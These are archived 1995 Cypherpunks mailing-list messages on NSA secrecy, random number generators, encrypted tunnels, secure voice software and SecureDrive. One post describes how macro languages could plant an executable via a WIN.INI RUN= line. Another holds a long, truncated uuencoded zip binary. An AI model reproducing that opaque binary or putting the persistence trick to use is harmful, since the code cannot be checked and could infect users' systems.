In other words, if their information ABOUT subliminal channels is
classified, they can't say they have no documents; they have to say, e.g.
"We have ten documents and they're all classified."  If they have any
documents, they can only legally claim to have no documents if just
confirming the existence of the documents would itself reveal
classified info.  This is called "Glomarizing" and it's named for the
Glomar Explorer, a ship which was secretly used for dredging up code
books from sunken Soviet submarines.  Merely confirming that records
existed on the Glomar would have revealed classified information (i.e.
that the government was involved; the cover story was that a private
company was using it for deep-sea mining experiments).

Apparently, merely confirming that NSA knows anything about subliminal
channels would reveal classified information.

If the mere existence of documents on subliminal channels is
classified, it's probably because they are very actively and very
secretly using them.  And this tends to reinforce my perception that
they are using them in Capstone, the heart of the Fortezza card.

You're free to dismiss all this as paranoid rambling.  However, if you
use a Fortezza card to generate your random numbers, you have no way
to determine how these numbers are being generated.  Are they really
random?  How could you tell?  Would you rather get "random" numbers
from a classified NSA-designed chip that's part of a family designed
to subvert your privacy?  Or would you rather get them from a
third-party product whose design you can actually verify?  I'd prefer
a random number generator where I can pull one "at random" from stock,
take it apart, and verify that it really does what its designers say
it does.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 22 Sep 95 19:37:44 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Council of Europe proposes to outlaw strong encryption (fwd)
In-Reply-To: <199509221509.LAA09991@panix.com>
Message-ID: <Pine.SUN.3.90.950922213352.3995A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain



I'll jump into this conversation for a second. I been wanting to set up
and IP proxy using Linux. It was support for IP over IP tunnels, and IP
Masquareding. Only thing is needed is to encrypt to IP over IP tunnel.
Just my $0.02.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Fri, 22 Sep 1995, Duncan Frissell wrote:

> This should prove about as effective as the current French or Russian bans.
> What are they going to do when they figure out that there need no longer be
> such a thing as a telecoms operator.  We do most of the message packaging
> ourselves.  It will be a bit difficult for any connectivity supplier to tell
> what's going out via one of our encrypted IP sessions.
> 
> Question for Perry -- I'm assuming that it will soon be possible to
> originate encrypted TCP/IP sessions with a distant "process" somewhere.  Do
> you see technical problems with a TCP/IP laundry being established
> "somewhere" that strips trace info from one of my processes and prevents
> back tracing beyond the mouth of this encrypted pipe?
> 
> Also Perry, what did you think of the article "How Anarchy Works" in the
> latest Wired on the IETF?
> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 18:32:03 PDT
To: adam@lighthouse.homeport.org>
Subject: WordBasic and other macro languages
Message-ID: <199509230130.VAA04956@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:47 1995.09.22 -0400, dmandl@panix.com wrote:
>On Fri, 22 Sep 1995, Adam Shostack wrote:
>> 	I keep hearing this thought.  Isn't Win95 with its
>> 'executables in email' much more dangerous than Java, which at least
>> tries to address security?
>
>Is that the new MS-Word you're thinking of?  I hear that it lets you
>imbed macros containing executable code in documents.  That's got to
>be one of the most dangerous ideas ever cooked up.

It's no worse than the other hundreds of products that have macro languages
that can write files (even the ones that can't execute other programs are
dangerous if they can write a real executable to a file and, say, add a
corresponding RUN= line in a WIN.INI or the equivalent to get it executed
later).  Word's is just more visible because the macro itself can behave
like a virus, because of Word's autoexec-macro feature that can make the
macro run automatically unless they user disables those options on his copy.

Many versions of PostScript have this kind of hole, I understand; some
disable the file-manipulation commands to be more secure.  I remember
hearing recently that Ghostscript, popular on PCs, is one that does have the
file-manips, but all of this is hearsay so I can't say for sure.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 18:33:29 PDT
To: cypherpunks@toad.com
Subject: Notes security question
Message-ID: <199509230133.VAA05532@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


While I'm at it, here's a question I've been wondering about recently: Why
is it I've never heard of any security issues with Lotus Notes?  Are there
no known weaknesses?  Or did existing weaknesses just not get much press
because Notes isn't a commercially visible consumer product like Netscape?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Fri, 22 Sep 95 20:15:36 PDT
To: cypherpunks@toad.com
Subject: another net phone (crypto)
Message-ID: <199509230313.XAA08112@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



I haven't seen this on the cypherpunk list so I thought I would forward it
as an FYI.  Interesting that source code is available!

>Subject: FWD: Free secure Internet voice communication
>From: John Walker <kelvin@fourmilab.ch>
>Subject: Free secure Internet voice communication
> 
> I've just released to the public domain Release 5 of Speak Freely for
> Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
> workstations.  Assuming you have a fast enough connection to the
> Internet (with reasonably consistent packet delivery time) and/or a
> fast enough CPU to perform audio compression in real time, you can
> talk to anybody on Earth connected to the Internet who's also running
> the program.  The Windows and Unix versions have entirely different
> user interfaces, but can intercommunicate.  Complete source code is
> available.
> 
> For communications security, IDEA, DES (less initial and final
> permutations), and one-time pad (re-used for each sound packet)
> encryption are available.  The intensely paranoid can enable any
> combination of these.  The documentation explains how to use PGP to
> securely exchange session keys before a conversation; an automatic
> session key generator is provided.  DES is included for commercial
> users who don't have a license to use the IDEA patent.  One-time pad
> encryption is for those with machines too slow to run IDEA or DES in
> real time.
> 
> I didn't include a public key mechanism because I wanted to avoid all
> the confusion.  If somebody wants to navigate the narrow strait
> between the RSA patent Scylla and Charybdis of export controls, the
> programming work to implement public keys is straightforward and the
> source code is yours to hack.
> 
> For further information, see:
> 
>     http://www.fourmilab.ch/netfone/windows/speak_freely.html
> 
> which describes the Windows version in detail and contains pointers to
> the Sun and SGI editions, as well as links to download source code and
> a ready-to-run executable for Windows.  You can also obtain the
> program by anonymous binary FTP:
> 
> Unix source code:
>     ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz
> 
> Windows executable:
>     ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip
> 
> Windows source code (for Visual C 1.5):
>     ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip
> 
> 
Have Fun!
 
Regards,

Mark Hittinger
Internet Manager
WinNET Communications, Inc.
bugs@win.net  bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Fri, 22 Sep 95 23:37:50 PDT
To: cypherpunks@toad.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509230636.XAA25093@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



At 9:50 PM 9/20/95, John Gilmore wrote:
>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.

Actually, even without going into the more analog characteristics of
these same standard cells (as Tim suggests: threshold measurement, DRAM
discharge time, and so on) you can do that using the really basic
behavior of really basic standard cells: I did that some 8 years ago
around a free-running ring oscillator (a bunch of basic logic gates in
a ring).

The problem I would look into first is that any such random number
generator (even the ones based on measurements of analog quantities)
would likely synchronize to some extend to the local noise (like CMOS
switching noise in sync with the chip clock). My impression is that if
you try and make the thing more impervious to noise, it will be less
random too, and the most prominent noise in such chips is not random
at all.

So, you could try to make it run fast, and place it in a slow chip
(like an older style UART), or you could try to kick it out of sync now
and then based on some external conditions (maybe) (bus signal arrival
time, serial line input, etc).

It's not guaranteed it would end up generating anything useful (maybe
not even to seed a software PRNG). I still like the idea of using
macroscopic events, many orders of magnitude different from system
operating frequencies: mouse location and timing sounds good. If you
want to get large amounts of random numbers, use a specially designed
separate box, well shielded, and running on batteries (like a walkman :-)

And a cryptographically secure software hash is always necessary.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Sat, 23 Sep 95 02:26:21 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive/Secure Device News
Message-ID: <79BVBD6w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My thanks to Mark Grant who suggested re the Iomega zip Drive & Secure
Device:

    On Sat, 16 Sep 1995, Edgar Swank wrote:

    >problem is that the DOS file must be present when the CONFIG.SYS
    >DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
    >driver is a TSR that doesn't get loaded until after all DEVICE
    >statements have been processed.

    There are programs around that will load DOS device drivers from
    the DOS command line after booting, there's one I've used at work
    called 'DEVLOD', but I don't know if it's commercial or freeware.
    If it's free it may be possible to find it on the Net somewhere.

I found several shareware/freeware programs which claim to have this
ability. The first one I tried,

    DMC35.ZIP       74710  11-29-93  Allows loading/unloading of dev. drivers
                                     /TSR's

did the job, loading SECDEV.SYS -after- the zip drive TSR was loaded.
Other possibilities, which are present in the SIMTEL archive in
the msdos/sysutil subdirectory would be,

comp.zip         5086  08-29-88  Load and unload device drivers after bootup
devic104.zip     7250  05-30-92  Load and unload device drivers after bootup
devlod.zip      18240  12-30-91  Dynamic load of device drivers after boot-up
drvins11.zip    12298  12-06-90  Load and unload device drivers after bootup
idrv01.zip      16369  04-10-92  Install/uninstall device drivers after
                                 bootup

although I haven't tried any of these.

- From a SecureDrive user comes the following warning:

    Norton Utilities' wipeinfo appears to CORRUPT a SecureDrive (1.3d)
    partition, and well as an SFS (1.17) one.

    That was with the F-PROT (2.19) anti-virus TSR in memory
    (virstop.exe). I did not encounter problems with it off.

I think the main fault would be with virstop.  The user didn't say,
but if virstop is loaded before sectsr, that could lead to bypassing
sectsr, accessing encrypted data directly, which is likely to corrupt
the whole partition.

A user has also informed me that RAWDSK11 (or RAWDRV11) is no longer
found at

   ftp.uni-duisburg.de: /pub/pc/misc/rawdsk11.zip

This is a utility useful with SecureDrive for tape backups. Since it's
a short program, I'll include a UUENCODED image of the file here. This
program does not do cryptography by itself, so ITAR does not apply.

Edgar Swank
SecureDrive Co-author

section 1 of uuencode 5.25 of file rawdrv11.zip    by R.E.M.

begin 644 rawdrv11.zip
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
